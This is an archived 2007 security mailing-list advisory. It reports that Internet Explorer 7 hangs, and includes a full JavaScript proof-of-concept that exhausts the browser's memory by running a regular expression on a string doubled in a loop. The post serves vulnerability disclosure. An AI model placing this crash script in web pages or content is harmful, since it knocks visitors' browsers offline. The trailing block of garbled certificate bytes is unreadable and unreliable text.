Internet Explorer Crash Apr 17 2007 05:09PM
J. Oquendo (sil infiltrated net) (1 replies)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'

I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang. The
memory and CPU usage go through the roof. Originally the script caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
while (z.length <=
999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999) z+=z;
var boum = reg.exec(z);

</script>

Goodbye

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFGJQGJh3J3NhODp0MRArt5AKCVI+A0rHdYMOz9KYIbCxFkMN8QcgCbBBBC
TCV7FOqA05H8sSDb0r8nSnk=
=J/DW
-----END PGP SIGNATURE-----

0? *?H?÷
 ?0?1 0 +0? *?H?÷
 ?0??0?r 'ôêôz?Än»n©0
 *?H?÷
0o1 0 USE10U
 AddTrust AB1&0$U AddTrust External TTP Network1"0 UAddTrust External CA Root0
050607080910Z
200530104838Z0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email0?"0
 *?H?÷
?0?
?²9?¤ò}«A;bF7®ÍÁ`u¼9eùJG¢¹ÌHÌj?ÕM5¹¤BåÎIâ?/|Ò1ÇN´?d.)Õ¢dÄ?½?Q5y¤
Nh{z¤?¨ò?ò?Ìɤ2?» O0½?  ?ån¢Fúx¼¢o«Y^¥/ÏÊÚmª/묡³jª·.g5?yái?âæFÍ ¥ê¾ Îv:z?êüÚ'[=s"æHaÆ
Lói±¨.¶Ô1 ,¼???¤¥×?CüZ¯q×YÚº?
¯úóáÂð¤Åg?ÖÖT:Þ
¤ºw³eÈýÓtbªÊh?¡?~õGeËøMW(tÒ4ÿ0¶îöb0?,룁á0Þ0U#0?­½?z4´
&÷úÄ&Tï½à$ËT0U??g}ĝ&pK´PH|Þ=®n}0Uÿ0Uÿ
0ÿ0{Ut0r08 6 4?2http://crl.comodoca.com/AddTrustExternalCARoot.c
rl06 4 2?0http://crl.comodo.net/AddTrustExternalCARoot.crl0
 *?H?÷
?Ø?o(¬¦¢ç?Á?Û~¡ýóâð©?TBk? Ä mא?fyCqüøo¯ÛvEâ7=ÝäYx¬ô?FózÏ[?r-åFÁº)óËIy?<ºm¤mhO­r6¨¹±ý¿Ï
ð¤j?5PÏmU±ÝY0Jßm ?dI|ï6»ôãiôø9Z­K?:·íÓÏ
D¢û¿ä/p?%ûZT³Ðļmûs2,é??$-Ö?zhP?MéÌõ»gèÜ.;üNÍþ?ã¨
¥&DeéòMR§®Ü>Êk2\Alþõ] êÿÑú??Xm=?Gåþ.?ÂÌ?¡ò»0?Á0?© 
Ñ¡øsß?-?HK?«'0
 *?H?÷
0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email0
061005000000Z
071005235959Z0Ù1503U ,Comodo Trust Network - PERSONA NOT VALIDATED1F0DU =Terms and Conditions of use: http://www.comodo.net/repository10U (c)2003 Comodo Limited10U
J. Oquendo1"0  *?H?÷
 sil (at) infiltrated (dot) net0 [email concealed]?0
 *?H?÷
0?½Ç?(ä$:²µDT,¢Ò;º»lpjÅ©rºSê:Ò#&Çây*?îE¥Ð)»ÜMHü~¨a¥Õ~
¹ÃX gÈÇgIçV¶§:'7ÕI´óÛ¥ªAcU|2Å^?ç¾ï¼bèïæ æ¾ÊÂ%Nï?eäùm?1×3¡+< DKu£?00?,0U#0???g}ĝ&pK´PH|Þ=®n}0
Un@.zÙ¶p_"µ?xx?rѬ$0Uÿ 0 Uÿ00 U%0+ +²10 `?H?øB 0FU ?0=0; +²10+0)+https://secure.comodo.net/CPS0¥U0?0
L J H?Fhttp://crl.comodoca.com/UTN-USERFirst-ClientAuthenticationandEmai
l.crl0J H F?Dhttp://crl.comodo.net/UTN-USERFirst-ClientAuthenticationand
Email.crl0?+z0x0;+0?/http://crt.comodoca.com/UTNAddTr
ustClientCA.crt09+0?-http://crt.comodo.net/UTNAddTrustClientCA.c
rt0U0sil (at) infiltrated (dot) net0 [email concealed]
 *?H?÷
?>|(aµ]ºGìC¡yÂó(ãü?tïë¤F<¡&S?»ê6î¢w¥ë}úæâp¾lê#è«ú]¢t^¦Ð(l??
uv?ç7¿ÒþÄÉë?#? ?PGsbT??ïÓî]>¤.¤I{?rE5K³ã?³øø?tWÏËÛXÜÊCo´ù²Öò
à´²qÃõD??þã rw¨g?+k+(`9qò!ÝÒÿ×g?Ü?¬?·¾MUõ·hóB±ò¸Äîz {?¼?|¨?6àS?&?çüJ÷??õJ?Éæ?[ýõT*?ÒéÒ'oEjÓÖ #B\Ã8ô
ö£?Ù?¯ñ¦7¶0?Á0?© 
Ñ¡øsß?-?HK?«'0
 *?H?÷
0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email0
061005000000Z
071005235959Z0Ù1503U ,Comodo Trust Network - PERSONA NOT VALIDATED1F0DU =Terms and Conditions of use: http://www.comodo.net/repository10U (c)2003 Comodo Limited10U
J. Oquendo1"0  *?H?÷
 sil (at) infiltrated (dot) net0 [email concealed]?0
 *?H?÷
0?½Ç?(ä$:²µDT,¢Ò;º»lpjÅ©rºSê:Ò#&Çây*?îE¥Ð)»ÜMHü~¨a¥Õ~
¹ÃX gÈÇgIçV¶§:'7ÕI´óÛ¥ªAcU|2Å^?ç¾ï¼bèïæ æ¾ÊÂ%Nï?eäùm?1×3¡+< DKu£?00?,0U#0???g}ĝ&pK´PH|Þ=®n}0
Un@.zÙ¶p_"µ?xx?rѬ$0Uÿ 0 Uÿ00 U%0+ +²10 `?H?øB 0FU ?0=0; +²10+0)+https://secure.comodo.net/CPS0¥U0?0
L J H?Fhttp://crl.comodoca.com/UTN-USERFirst-ClientAuthenticationandEmai
l.crl0J H F?Dhttp://crl.comodo.net/UTN-USERFirst-ClientAuthenticationand
Email.crl0?+z0x0;+0?/http://crt.comodoca.com/UTNAddTr
ustClientCA.crt09+0?-http://crt.comodo.net/UTNAddTrustClientCA.c
rt0U0sil (at) infiltrated (dot) net0 [email concealed]
 *?H?÷
?>|(aµ]ºGìC¡yÂó(ãü?tïë¤F<¡&S?»ê6î¢w¥ë}úæâp¾lê#è«ú]¢t^¦Ð(l??
uv?ç7¿ÒþÄÉë?#? ?PGsbT??ïÓî]>¤.¤I{?rE5K³ã?³øø?tWÏËÛXÜÊCo´ù²Öò
à´²qÃõD??þã rw¨g?+k+(`9qò!ÝÒÿ×g?Ü?¬?·¾MUõ·hóB±ò¸Äîz {?¼?|¨?6àS?&?çüJ÷??õJ?Éæ?[ýõT*?ÒéÒ'oEjÓÖ #B\Ã8ô
ö£?Ù?¯ñ¦7¶1?Ï0?Ë0Ã0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email
Ñ¡øsß?-?HK?«'0 + ?a0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
070417170913Z0# *?H?÷
 1Ú?ùª¤-,º¬>(Ô Ç¯ÓÉ0R *?H?÷
 1E0C0
*?H?÷
0*?H?÷
?0
*?H?÷
@0+0
*?H?÷
(0Ô +?71Æ0Ã0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email
Ñ¡øsß?-?HK?«'0Ö *?H?÷
  1Æ Ã0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email
Ñ¡øsß?-?HK?«'0
 *?H?÷
??l=h1¯vBÓøɍü2XÆpú9ÄE× ? IÖ?7ÊLy ê^?óàâgiÅu¯±·Iótë#¦ë¡?n¼B0?^?Û?ï_ó?µ¸ïöÆ ±c'^'+ bw??i±vý£ª??ùû
#tH)¥äM¹fZ1L+ÁC³T

[ reply ]
Re: Internet Explorer Crash Apr 17 2007 08:27PM
The Anarcat (anarcat anarcat ath cx) (2 replies)
Re: Internet Explorer Crash Apr 19 2007 07:30PM
simone colombo (colombo simone gmail com)
Re: Internet Explorer Crash Apr 17 2007 11:02PM
Mike Ely (me taupehat com)


 

Privacy Statement
Copyright 2010, SecurityFocus